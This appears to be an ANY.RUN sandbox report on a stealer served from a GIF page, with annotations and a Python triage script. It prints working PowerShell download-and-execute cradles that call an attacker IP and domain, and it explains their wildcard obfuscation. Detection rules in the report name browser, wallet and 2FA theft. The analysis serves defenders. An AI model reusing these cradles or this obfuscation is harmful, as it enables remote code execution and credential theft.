URL:

https://www.gifcen.com/satoru-gojo-gif-61/

Full analysis: https://app.any.run/tasks/ea46eeca-bfaa-44d0-a491-99828df767f9
Verdict: Malicious activity
Threats:

Stealers are a class of malware built to collect users' information without authorization and exfiltrate it to the attacker. The category covers programs that each target a particular kind of data, such as files, saved passwords and cryptocurrency wallets, and many stealers also spy on the victim by logging keystrokes and taking screenshots. They are distributed mainly through phishing campaigns.

Analysis date: January 22, 2026, 19:49:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
python
Indicators:
MD5: 6548F681CD72FD3545DBFF9CE625E133
SHA1: 134DAE929038A73B345D92358E1C26B98533BFBD
SHA256: 579CAA47F5900C3B70662396F4126BA406EAF64FEAFB0BE5129453F773BDB949
SSDEEP: 3:N8DSLCAlmERKtBTMnn:2OLCAlm4Kgn

ANY.RUN is an interactive service that gives the analyst full access to the guest system. Information in this report can therefore be distorted by user actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Uses SyncAppvPublishingServer as a PowerShell host to execute PowerShell code

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 1324)
    • Changes powershell execution policy (RemoteSigned)

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)
    • Uses sleep, probably for detection evasion (SCRIPT)

      • wscript.exe (PID: 4064)
    • Actions look like stealing of personal data

      • powershell.exe (PID: 8640)
    • Steals credentials from Web Browsers

      • powershell.exe (PID: 8640)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 4996)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 8640)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 6232)
  • SUSPICIOUS

    • Manipulates environment variables

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 1324)
    • The process hides an interactive prompt from the user

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 6232)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 6232)
    • The process executes VB scripts

      • powershell.exe (PID: 5444)
    • Starts process via Powershell

      • powershell.exe (PID: 1324)
    • Executes script without checking the security policy

      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
    • Possible stealing from crypto wallets

      • powershell.exe (PID: 8640)
    • Possible stealing of messenger data

      • powershell.exe (PID: 8640)
    • Possible stealing from browsers

      • powershell.exe (PID: 8640)
    • Possible stealing of email data

      • powershell.exe (PID: 8640)
    • Possible stealing of cloud data

      • powershell.exe (PID: 8640)
    • Possible stealing from password managers

      • powershell.exe (PID: 8640)
    • Possible stealing of FTP data

      • powershell.exe (PID: 8640)
    • Possible stealing from 2FA applications

      • powershell.exe (PID: 8640)
    • Possible stealing of VPN data

      • powershell.exe (PID: 8640)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 8640)
    • Application launched itself

      • powershell.exe (PID: 8640)
    • Probably download files using WebClient

      • powershell.exe (PID: 8640)
    • Found IP address in command line

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 4996)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 772)
    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Possible path obfuscation (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Receives information about network interfaces and IP addresses (POWERSHELL)

      • powershell.exe (PID: 6232)
    • Process drops python dynamic module

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Loads Python modules

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Connects to unusual port

      • bdsou.exe (PID: 8156)
  • INFO

    • Drops script file

      • chrome.exe (PID: 3344)
      • wscript.exe (PID: 3400)
      • powershell.exe (PID: 5444)
      • wscript.exe (PID: 4064)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 772)
    • Application launched itself

      • chrome.exe (PID: 3344)
    • Checks proxy server information

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 8640)
      • slui.exe (PID: 5016)
      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 3916)
      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Connects to unusual port

      • chrome.exe (PID: 6628)
    • Disables trace logs

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 3916)
      • dn9b3.exe (PID: 7780)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5444)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 6232)
    • Manual execution by a user

      • wscript.exe (PID: 3400)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 6232)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 772)
      • powershell.exe (PID: 6232)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 6232)
    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
    • The sample is compiled with English language support

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
    • The executable file from the user directory is run by the PowerShell process

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Python executable

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Checks supported languages

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Reads the machine GUID from the registry

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Reads the computer name

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)
    • Reads Environment values

      • dn9b3.exe (PID: 7780)
    • Reads security settings of Internet Explorer

      • bdsou.exe (PID: 8156)
      • dn9b3.exe (PID: 7780)
    • Creates files or folders in the user directory

      • bdsou.exe (PID: 8156)
No Malware configuration.
All screenshots are available in the full report
Total processes: 213
Monitored processes: 54
Malicious processes: 8
Suspicious processes: 1

Behavior graph

start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs slui.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs dn9b3.exe bdsou.exe svchost.exe

Process information

(each entry lists PID, CMD, Path, Parent process, then the process details and the first loaded modules)
PID: 148
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=2364,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=2412 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
PID: 772
CMD: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://194.150.220.218/4SLEYpfAk57hGubo/dn9b3')"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 936
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1040
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=6128,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=5984 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 1092
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe"
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: powershell.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 1324
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;saps C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\?owershell.??? -Arg '-NoP -C & (gal i*************************************************************************************************************?*********************x)(& (gcm *************************************************************************************************************************estM*****************************************************) repl-fabric94.system-api-cloud-application.in.net/748412-crashreport);while(1){sleep 60}' -Wi Hidden}
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
Note: the ? and * characters are PowerShell wildcards exactly as captured, not redaction. ?owershell.??? resolves to powershell.exe in the 32-bit SysWOW64 directory, gal i*?*x returns the iex alias (Invoke-Expression) and gcm *estM* returns Invoke-RestMethod, so the hidden 32-bit child effectively runs Invoke-Expression (Invoke-RestMethod repl-fabric94.system-api-cloud-application.in.net/748412-crashreport) and then loops on sleep 60 to stay alive.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1620
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=6008,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=5228 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 2292
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2640
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --disable-quic --string-annotations --field-trial-handle=6580,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=6632 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 2688
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=5540,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=5052 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
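The two PowerShell command lines in the process list (PID 1324, spawned by wscript.exe, and PID 772, the 32-bit download cradle) are the infection chain in miniature, and the signature list earlier on this page is what a sandbox derives from them. The script below is an added example, not ANY.RUN's code and not anything recovered from the sample: it resolves the wildcard cmdlet lookups in PID 1324's command line the way Get-Alias and Get-Command would, then runs regex rules modelled on the sandbox signatures over both command lines and pulls out the network indicators. The alias and cmdlet table is a small constructed subset of PowerShell's built-ins, the rule regexes are my own, the asterisk runs in the copied command line are shortened (the sample pads each to roughly a hundred characters), and the benign control record (PID 9999 under explorer.exe) is invented.

```python
"""Triage the PowerShell command lines from this report (added example, not ANY.RUN code)."""
from __future__ import annotations
import fnmatch
import re

# Constructed subset of PowerShell built-in aliases/cmdlets (the real tables are far
# larger; user-defined aliases are not considered).
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression", "irm": "Invoke-RestMethod", "iwr": "Invoke-WebRequest",
    "saps": "Start-Process", "gal": "Get-Alias", "gcm": "Get-Command", "icm": "Invoke-Command",
    "ipmo": "Import-Module", "sleep": "Start-Sleep", "sal": "Set-Alias",
}
BUILTIN_CMDLETS = sorted(set(BUILTIN_ALIASES.values()) |
                         {"Test-Path", "Test-ModuleManifest", "Get-ChildItem", "Set-ExecutionPolicy"})

def squeeze_wildcards(pattern: str) -> str:
    """A run of '*' (the sample pads each to ~100 chars) means the same as one '*'."""
    return re.sub(r"\*+", "*", pattern)

def resolve_alias(pattern: str) -> list[str]:
    """Alias names `gal <pattern>` would return (PowerShell matching is case-insensitive)."""
    pat = squeeze_wildcards(pattern).lower()
    return sorted(a for a in BUILTIN_ALIASES if fnmatch.fnmatchcase(a, pat))

def resolve_command(pattern: str) -> list[str]:
    """Command names `gcm <pattern>` would return."""
    pat = squeeze_wildcards(pattern).lower()
    return sorted(c for c in BUILTIN_CMDLETS if fnmatch.fnmatchcase(c.lower(), pat))

LOOKUP_RE = re.compile(r"\(\s*(gal|get-alias|gcm|get-command)\s+([^\s)]+)\s*\)", re.I)

def deobfuscate(cmd: str) -> str:
    """Replace `(gal <wild>)` / `(gcm <wild>)` with the single command each resolves to."""
    def _sub(m: re.Match) -> str:
        verb, pattern = m.group(1).lower(), m.group(2)
        if verb in ("gal", "get-alias"):
            names = [BUILTIN_ALIASES[a] for a in resolve_alias(pattern)]
        else:
            names = resolve_command(pattern)
        return names[0] if len(names) == 1 else m.group(0)   # ambiguous: leave untouched
    return LOOKUP_RE.sub(_sub, cmd)

# Detection rules modelled on the sandbox signatures: (name, case-insensitive regex).
RULES = [
    ("SyncAppvPublishingServer as PowerShell host", r"sync-?appvpublishingserver"),
    ("hidden window", r"-w[indowstyle]{0,10}\s+hid"),                  # -WindowStyle / -Wi / -W Hidden
    ("execution policy bypass", r"-e[xecutionpolicy]{0,15}\s+bypass"),  # -ExecutionPolicy / -ep Bypass
    ("download cradle", r"downloadstring|downloadfile|net\.webclient|invoke-restmethod|"
                        r"invoke-webrequest|\birm\b|\biwr\b"),
    ("Invoke-Expression", r"\biex\b|invoke-expression"),
    ("wildcard cmdlet lookup (gal/gcm)", r"\b(?:gal|get-alias|gcm|get-command)\s+[\w*?-]*[*?]"),
    ("IP literal in URL", r"https?://(?:\d{1,3}\.){3}\d{1,3}"),
    ("wildcard in executable path", r"\\[^\\\s]*[?*][^\\\s]*"),          # e.g. \?owershell.???
    ("PSModulePath redirected", r"\$env:psmodulepath\s*="),
    ("infinite sleep loop", r"while\s*\(\s*1\s*\)\s*\{\s*sleep"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]
NETWORK_RE = re.compile(r"\b[\w-]+(?:\.[\w-]+){2,}(?:/[\w./-]*)?")  # host-or-IP plus path

def scan(cmd: str) -> list[str]:
    """Names of the rules that fire; rules see both the raw and the de-obfuscated text."""
    text = cmd + "\n" + deobfuscate(cmd)
    return [name for name, rx in COMPILED if rx.search(text)]

def extract_network_indicators(cmd: str) -> list[str]:
    """Tokens with three or more dot-separated labels (domains, dotted IPs) and their path."""
    return NETWORK_RE.findall(cmd)

# Command lines copied from the Process information section (asterisk runs shortened)
# plus one constructed benign control.
CMD_1324 = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden '
            r'-ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); '
            r'import-module AppvClient; Sync-AppvPublishingServer n;'
            r'saps C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\?owershell.??? -Arg '
            r"'-NoP -C & (gal i*****?*****x)(& (gcm *****estM*****) "
            r"repl-fabric94.system-api-cloud-application.in.net/748412-crashreport);while(1){sleep 60}' -Wi Hidden}")
CMD_772 = (r'''powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient)'''
           r'''.DownloadString('http://194.150.220.218/4SLEYpfAk57hGubo/dn9b3')"''')
CMD_BENIGN = r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'  # constructed

RECORDS = [  # pid / parent as reported on this page; 9999 is the constructed control
    {"pid": 1324, "parent": "wscript.exe", "cmd": CMD_1324},
    {"pid": 772, "parent": "powershell.exe", "cmd": CMD_772},
    {"pid": 9999, "parent": "explorer.exe", "cmd": CMD_BENIGN},
]

def triage(records=RECORDS) -> dict[int, dict]:
    """Per PID: parent, fired rules, extracted network indicators, de-obfuscated command."""
    return {r["pid"]: {"parent": r["parent"], "hits": scan(r["cmd"]),
                       "network": extract_network_indicators(r["cmd"]),
                       "deobfuscated": deobfuscate(r["cmd"])} for r in records}

if __name__ == "__main__":
    for pid, info in triage().items():
        print(f"PID {pid} (parent {info['parent']}): {len(info['hits'])} rule(s) fired")
        for hit in info["hits"]:
            print("   -", hit)
        print("   network:", info["network"] or "-")
        print("   resolved:", info["deobfuscated"])
```

The detail worth noticing when the script runs is that the Invoke-Expression and download-cradle rules fire on PID 1324 only after the wildcard lookups are resolved; that indirection is exactly what the sample buys with gal and gcm, so a detector that only pattern-matches raw command lines for iex or Invoke-RestMethod misses the first stage and catches only the plain-text cradle of PID 772. On a live host Get-Alias also returns user-defined aliases, so resolution against this built-in-only table can differ from what the victim's PowerShell would actually pick.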
Total events: 54 333
Read events: 54 302
Write events: 31
Delete events: 0

Modification events (10 shown; all are registry writes by PID 8640 powershell.exe)

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing = 0
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableAutoFileTracing = 0
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing = 0
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask = (value not shown in report)
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask = (value not shown in report)
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize = 1048576
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32\FileDirectory = %windir%\tracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableFileTracing = 0
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableAutoFileTracing = 0
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableConsoleTracing = 0

Caveat: Tracing\<process>_RASAPI32 and _RASMANCS keys with exactly these default values are created when a process first initialises the RAS/WinINet networking stack, and the WOW6432Node path shows PID 8640 is a 32-bit process. The "Disables trace logs" signature above therefore reflects the stealer making network connections, not a deliberate anti-forensics step; treat it as supporting evidence, not as an indicator on its own.
Executable files: 30
Suspicious files: 130
Text files: 109
Unknown types: 0

Dropped files (10 shown; PID, process, filename; the report lists no MD5/SHA256 for these entries)

3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old~RF1b3fe4.TMP
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF1b3ff3.TMP
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF1b4013.TMP
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF1b4013.TMP
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RF1b4013.TMP
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF1b4013.TMP
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
3344 chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old

Caveat: every entry shown is a LevelDB log rotation written by the browser itself (PID 3344) under the Default profile. The files that matter for the stealer, the Python runtime and C-runtime libraries dropped by PIDs 3916 and 772 and the dn9b3.exe and bdsou.exe executables they launched from the user directory, are not in this excerpt.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 215
TCP/UDP connections: 158
DNS requests: 130
Threats: 31

HTTP requests (10 of 215 shown; PID, process, method and HTTP code, IP:port, URL, CN, type and size, reputation; fields the report left blank are omitted)

6628 chrome.exe | OPTIONS 204 | 104.18.11.59:443 | https://bsc-testnet.drpc.org/ | CN unknown | reputation unknown
6628 chrome.exe | GET 403 | 172.240.127.234:443 | https://impressexaltsculptor.com/e2/4d/21/e24d218fcaf4ffaaf75ba17ee0041b18.js | CN unknown | reputation unknown
